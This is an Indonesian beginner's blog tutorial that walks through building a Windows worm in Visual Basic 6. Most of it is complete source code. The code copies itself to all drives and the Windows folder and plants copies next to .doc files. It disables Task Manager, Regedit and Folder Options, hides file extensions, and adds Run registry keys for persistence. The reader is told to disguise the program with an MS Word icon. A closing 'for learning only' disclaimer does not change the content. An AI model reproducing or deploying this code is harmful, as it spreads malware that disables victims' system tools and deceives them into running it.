Mengenal Program Virus

Ok… sperti peringatan para newbie yang laen,,, bagi kakak2 yang sudah merasa pinter2 sadar diri
dong… mendingan pergi aja… dari pada lelah ketawa terus kesambet karena baca tulisan ini (Ini
Khusus Newbie).
…em… sebenarnya… Penulis mendapatkan ini dari buku2 & tutorial2 di internet yang digabungkan
sedemikian rupa trus jadilah pengalaman yang cukup menjengkelkan bagi penulis sendiri, compi
rusak, harus install ulang… ya… karna masih bodoh dan penasaran. Tapi ga’ pa2 lah buat
pembelajaran… “experience is the best teacher”
Ehm… Virus adalah sebuah program buatan programmer2 yang biasanya bersifat merusak… oppzz…
maaf bagi para programmer2, karena penulis sampai sekarang belom pernah tau kalo ada program
virus yang tidak merusak & menguntungkan… hehehe….. virus jenisnya juga banyak… ada Trojan,
worm, confiker dan masih banyak lagi “ kenapa sih kita harus mengenali virus….Kan merusak?” ok lah
kalo ada pertanyaan seperti itu, kita Cuma mengenal aja… supaya kita lebih waspada… karena
dunia ini penuh dengan tipu daya…. Walaahhhhh….. sok tua…. Hahaha….
Disini penulis akan mengenalkan cara kerja virus sejenis worm gitudeeehhhh…… Virus ini
menggandakan ke drive seperti hard disk, flash disk, dll. Dan juga menginfeksi file dengan extensi
tertentu, seperti file .exe, .jpg, .doc, dll. Terserah pembuat mau menginfeksi file apa…
Didalam dunia program memrogram, biasanya ada aturannya seperti logika ato al… apa ya?
Algoritma,,, hehe… lupa, ok… kira2 logikanya seperti berikut…. Bismillah…

                                                              [Start]
                                                                   |
      [aktifkan Program Virus]
                                                                   |
                                                  [proses penggandaan]
                                                                  |
                             [cek apakah file telah digandakan] Tidak [menggandakan file]
                                                                 | |
|
                                                       [infeksi file]  
                                                                  |
                             [cek apakah file telah diinfeksi] tidak [infeksi]
                                                                 | |
                                                                  |
                                         [aktifkan kode pertahanan]  
                                                                  |
                                                              [end]

Maaf kalo masih amburadul,, maklum deh… masih pemula… Ok langsung ke projectnya…. Disini
penulis pake Vb yang versi 06,, ehm… nyalain rokok, sambil dengerin lagu2 …Em… aku suka lagu2
jepang & korea : “Sambil promosi” hehe…:P Siapkan formya & copy paste code berikut : Bismilah…

Option Explicit
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal LDrive As String) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lBuffer As String,
ByVal xSize As Long) As Long
Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As
WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As
WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal
lpNewFileName As String, ByVal bFaillExists As Long) As Long
Private pbMessage As Boolean
Private Function DriveType(Drive As String) As String
Dim cari As Long, kenali As String
If Len(penyimpan) = 1 Then penyimpan = penyimpan & ":\"
If Len(penyimpan) = 2 And Right$( penyimpan, 1) = ":" Then penyimpan = penyimpan & "\"
cari = GetDriveType(Drive)
Select Case cari
Case 2
kenali = "Removable Drive"
Case 3
kenali = "Fixed Drive"
Case 4
kenali = "Remote Drive"
Case 5
kenali = "CD-ROM"
Case 6
kenali = "RAM Disk"
Case Else
kenali = "Drive Doesn't Exist"
End Select
DriveType = kenali
End Function
Private Sub KopiKeDrive()
Dim ctr As Integer
Dim Drive As String
Dim x As Byte
ReDim Drives(0) As String
For ctr = 65 To 90
Drive = Chr(ctr) & ":\"
If DriveType(Drive) <> "Drive Doesn't Exist" Then
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Drive & "KageBunshinNinjutsu.exe"
End If
Next
End Sub
Private Sub Kopykewindow()
Dim ff As String * 255
Dim n As Long
n = GetWindowsDirectory(ff, 255)
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Left(ff, n) & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\" & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32" & "Nara.exe"
End Sub
Public Sub GetFiles(path As String, subFolder As Boolean, Optional Pattern As String = "*.*")
Screen.MousePointer = vbHourglass
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
fPath = AddBackSlash(path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
Wend
End If
If subFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
Screen.MousePointer = vbDefault
End Sub
Private Function StripNulls(f As String) As String
StripNulls = Left$(f, InStr(1, f, Chr$(0)) - 1)
End Function
Private Function AddBackSlash(S As String) As String
If Len(S) Then
If Right$(S, 1) <> "\" Then
AddBackSlash = S & "\"
Else
AddBackSlash = S
End If
Else
AddBackSlash = "\"
End If
End Function
Private Sub Infeksi()
GetFiles "c:", True, ".doc"
GetFiles "d:", True, ".doc"
GetFiles "e:", True, ".doc"
End Sub
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value
End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"
End Sub
Private Sub Kasi_integer()
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedVal
ue", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DevaultValu
e", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedV
alue", 2
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DevaultVal
ue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0
CreateIntegerKey
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun", 1
End Sub
Private Sub Bertahan()
Dim petik As String
petik = """"
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\System32\
Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\ Nara.exe"
& petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\ Nara
.exe" & petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik &
"C:\WINDOWS\System32\Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\Virus", petik &
"C:\WINDOWS\System32\ Nara.exe" & petik
End Sub
Private Sub form_click()
App.TaskVisible = False
Me.visible = false
KopiKeDrive
Kopykewindow
Infeksi
Kasi_integer
Bertahan
End Sub

Finishing, cari icon MS Word. Dan pada form ganti iconnya di properties dengan icon MS word.

Selesai, tinggal compile dan rasakan efeknya… cari di drive apakah ada file yang bernama
KageBunshinNinjutsu.exe bila ada… berarti virus yang anda buat telah jadi, eit… tunggu dulu! Virus ini
juga menginfeksi file doc,,, cari file .doc di drive yang diinfeksi,, dan tara……… pasti anda juga tau
sendiri nanti… hehehe….. tapi tenang… ga’ hilang kok… Cuma ada file .doc yang serupa tapi salah
satunya adalah file copian dari virus yang anda buat tadi… em… apa lagi ea… oh… hampir lupa,
Task Manager, Regedit, Folder Option juga ga’ bisa dibuka… ya…. Itu yang menjadi suatu pertahanan
dari virus. Cukup menjengkelkan kan… namanya juga virus… nanti kalau ada virus yang tidak
menjengkelkan, baik bagi semua orang, & menguntungkan kasih tau aku ea… tapi kalau buat
pembelajaran ga’ pa2 ko’…  dan jangan disalah gunakan… Ok…! terimakasih.

bangbedu

Mengenal Program Virus